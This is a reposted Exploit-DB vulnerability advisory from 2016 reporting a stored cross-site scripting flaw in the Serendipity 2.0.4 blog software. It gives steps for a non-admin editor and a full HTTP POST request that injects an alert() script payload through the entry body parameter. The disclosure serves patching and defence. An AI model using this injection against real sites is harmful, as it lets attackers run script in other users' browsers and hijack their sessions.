S9Y Serendipity 2.0.4 – Cross-Site Scripting - 体验盒子

作者： Besim

日期： 2016-10-31

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/40650/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

========================================

Title: Serendipity-2.0.4 (latest version) -Stored Cross Site Scripting

Application: Serendipity

Class: Sensitive Information disclosure

Versions Affected:<= latest version

Vendor URL: http://docs.s9y.org/

Software URL: http://docs.s9y.org/downloads.html

Bugs: Persistent Cross Site Scripting

Date of found:29.10.2016

Author: Besim

========================================

2.CREDIT

========================================

Those vulnerabilities was identified by Meryem AKDOĞAN and Besim ALTINOK

3. VERSIONS AFFECTED

========================================

<= latest version

4. TECHNICAL DETAILS & POC

========================================

Stored Cross Site Scripting (No Admin Required)

========================================

1) Editor login panel

2) User click 'New Entry'

3) Attacker(normal user) enter xss payload to 'Entry Body' input

4) Vulnerability Parameter and Payload : &body=<Script>alert('Meryem ExploitDB')</Script>

### HTTP Request###

POST /serendipity/serendipity_admin.php? HTTP/1.1

Host: site_name

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://site_name/serendipity/serendipity_admin.php?serendipity[adminModule]=entries&serendipity[adminAction]=new

Cookie: ---

Connection: close

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

Content-Length: 762

- POST DATA

serendipity[action]=admin

&serendipity[adminModule]=entries

&serendipity[adminAction]=save

&serendipity[id]=

&serendipity[timestamp]=1477314176

&serendipity[preview]=false

&serendipity[token]=324fa32a404e03de978d9a18f86a3338

&serendipity[title]=New Page

&serendipity[body]=<Script>alert('Meryem ExploitDB')</Script>

&serendipity[extended]=

&serendipity[chk_timestamp]=1477314176

&serendipity[new_timestamp]=2016-10-24 15:02

&serendipity[isdraft]=false

&serendipity[allow_comments]=true

&serendipity[had_categories]=1

&serendipity[propertyform]=true

&serendipity[properties][access]=public

&ignore_password=

&serendipity[properties][entrypassword]=

&serendipity[change_author]=4